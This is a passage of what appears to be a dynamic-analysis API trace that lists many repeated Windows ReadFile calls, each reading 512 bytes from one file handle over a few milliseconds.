lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: 